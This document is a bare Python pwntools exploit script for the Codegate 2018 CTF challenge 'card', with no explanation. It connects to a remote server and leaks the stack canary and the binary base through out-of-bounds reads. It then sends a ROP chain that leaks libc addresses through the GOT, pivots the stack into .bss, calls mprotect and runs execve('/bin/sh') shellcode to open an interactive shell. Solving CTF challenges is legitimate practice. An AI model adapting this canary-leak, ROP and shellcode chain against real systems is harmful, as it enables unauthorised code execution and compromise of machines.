Codegate 2018 'card' exploit code

#!/usr/bin/python

from pwn import *
from struct import *

p = process("./card")
p = remote("110.10.147.17",8888)
e = ELF("./card")
l = ELF("/lib/i386-linux-gnu/libc.so.6")
l = ELF("/lib32/libc.so.6")
raw_input(">>>")

pppr = 0x1439
leaveret = 0xd3c
pebpret = 0x143b

addr = 0

def leak(snum):
	addr = 0
	for i in [1,0x100,0x10000,0x1000000]:
		p.readuntil("x, y : ")
		p.sendline("{},0".format(snum))
		p.readuntil("= ")
		addr += i*int(p.readuntil("\n")[:-1])
		snum += 1
	return addr

p.sendline("1")
p.sendline("77777")
raw_input(">>>")
base = leak(668)-0x12f3
stack = leak(664)
canary = leak(652)
ebx = leak(656)
tgt = (0x100000000-stack+716)+base+0x3020

print hex(stack)
print hex(base)
print hex(canary)
print hex(ebx)
#print hex(tgt)
#print tgt
#print tgt/24
#print tgt%24

p.sendline("{},0".format(tgt))
p.sendline("{},{}".format(tgt%24,tgt/24))
p.sendline("648,0")
p.sendline("0,27")
p.sendline("649,0")
p.sendline("1,27")
p.sendline("624,0")
p.sendline("0,26")
p.readuntil("Name :")
raw_input(">>>")

dummy = "A"*500

payload = dummy
payload += p32(canary)
payload += "AAAA"+p32(ebx)+"CCCC"

print hex(base+e.plt['puts'])
payload += p32(base + e.plt['puts'])
payload += p32(base + pppr+2)
payload += p32(base + e.got['atoi'])
payload += p32(base + e.plt['puts'])
payload += p32(base + pppr+2)
payload += p32(base + e.got['printf'])

payload += p32(base + e.plt['read'])
payload += p32(base + pppr)
payload += p32(0)
payload += p32(base + e.symbols['__bss_start'])
payload += p32(0x2000)

payload += p32(base + pebpret)
payload += p32(base + e.symbols['__bss_start']-4)
payload += p32(base + leaveret)

p.sendline("314ckC47 Hacked This")
sleep(1)
p.sendline(payload)
print p.readuntil("\n\n")
print p.readuntil("\n\n")

sleep(1)

libc_read = u32(p.read(4))
p.readuntil("\n")
libc_printf = u32(p.read(4))
libc_main = libc_read-l.symbols['atoi']
libc_mprotect = libc_main + l.symbols['mprotect']
libc_binsh = libc_main + 0x15ba0b

sleep(1)

print hex(libc_read)
print hex(libc_printf)
print hex(libc_main)
print hex(libc_mprotect)
print hex(libc_binsh)

payload = ''
payload += p32(libc_mprotect)
payload += p32(0x100+e.symbols['__bss_start']+base)
payload += p32(0xfffff000&(e.symbols['__bss_start']+base))
payload += p32(0x1000)
payload += p32(7)
payload += "\x90"*0x100
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

p.sendline(payload)

p.interactive()